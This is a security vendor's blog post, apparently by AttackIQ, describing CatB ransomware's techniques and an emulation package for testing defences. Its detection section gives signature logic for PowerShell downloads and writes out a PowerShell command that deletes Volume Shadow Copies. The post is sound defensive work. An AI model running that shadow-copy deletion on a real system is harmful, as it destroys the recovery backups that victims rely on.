Emulating the Misleading CatB Ransomware – Source: securityboulevard.com

CatB ransomware, also known as CatB99 or Baxtoy, emerged in late 2022 and has gained attention for its use of DLL hijacking via Microsoft Distributed Transaction Coordinator (MSDTC) to execute its payload. It is suspected to be a rebrand of Pandora ransomware, as the notes share significant similarities. CatB is notable for its evasion tactics and the ability to detect and bypass virtual machine (VM) environments. In addition to encrypting files, it also attempts to steal browser data and credentials.

CatB has been linked to the suspected cyber espionage group ChamelGang (also known as CamoFei). According to SentinelOne, the group has deployed CatB ransomware in operations that impact high-profile organizations worldwide likely aimed at distracting from its core espionage activities. The attribution of ransomware usage to actors such as ChamelGang reflects a shift in adversary behavior, indicating a growing trend of blending criminal tactics with espionage goals to obscure detection.

AttackIQ has released a new attack graph composed of the several Tactics, Techniques and Procedures (TTPs) exhibited by CatB ransomware during its most recent activities to help customers validate their security controls and their ability to defend against this sophisticated threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:

• Evaluate security control performance against baseline behaviors associated with CatB ransomware.
• Assess their security posture against a ransomware family targeting organizations worldwide.
• Continuously validate detection and prevention pipelines against a playbook similar to those used by currently active ransomware groups.

[Malware Emulation] CatB Ransomware – 2023-03 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of CatB ransomware on a compromised system, including discovery and encryption activities to provide customers with the opportunity to detect and/or prevent a compromise in progress.

This emulation is based on SentinelOne’s report released on March 13, 2023, and supported by the technical analysis published by Fortinet in February 2023.

Initial Access & Discovery – Malware Delivery and VM Environment Checks

At this stage, the CatB dropper is deployed into the system to perform initial reconnaissance. It collects hardware and system drive information and uses the GlobalMemoryStatusEx API to gather details about the system’s physical and virtual memory.

Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious content.

System Information Discovery (T1082): This scenario calls GetSystemInfo Native API function to retrieve system hardware information. This can be used to detect sandboxes, create unique identifiers, and adjust execution behaviors.

System Information Discovery (T1082): This scenario calls the DeviceIoControl Native API function to retrieve system drive information, such as the serial number, to profile the target’s system.

System Information Discovery (T1082): This scenario executes the GlobalMemoryStatusEx Windows API call to gather information about physical and virtual memory.

Execution & Impact – Ransomware Execution and Encryption

At this stage, the CatB ransomware sample is deployed using DLL search order hijacking. It then terminates specific security-related processes to prepare the system for encryption. Afterward, it collects information from web browsers and proceeds to encrypt the victim’s files.

Hijack Execution Flow: DLL Search Order Hijacking (T1574.001): This scenario exploits Microsoft’s Dynamic-Link Library (DLL) search order to load a rogue DLL into a trusted system binary. By leveraging the trust placed in system binaries by administrators, malicious code can run undetected.

Impair Defenses: Disable or Modify Tools (T1562.001): This scenario simulates a threat actor using a PowerShell script to execute the taskkill command, aiming to terminate a specific process. This technique is often employed to disable security features on target assets.

Browser Information Discovery (T1217): This scenario leverages a PowerShell script to enumerate browser bookmarks which can reveal personal information about users and internal network resources.

Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by CatB ransomware.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

• M1031 – Network Intrusion Prevention

2. Inhibit System Recovery (T1490):

Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.

2a. Detection

Detecting deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at the command line activity

Process Name == powershell.exe
Command Line == “Get-WmiObject Win32_ShadowCopy | ForEach-Object ($_.Delete();)”

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery

Wrap Up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against CatB Ransomware. With data generated from continuous testing and the use of this attack graph, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.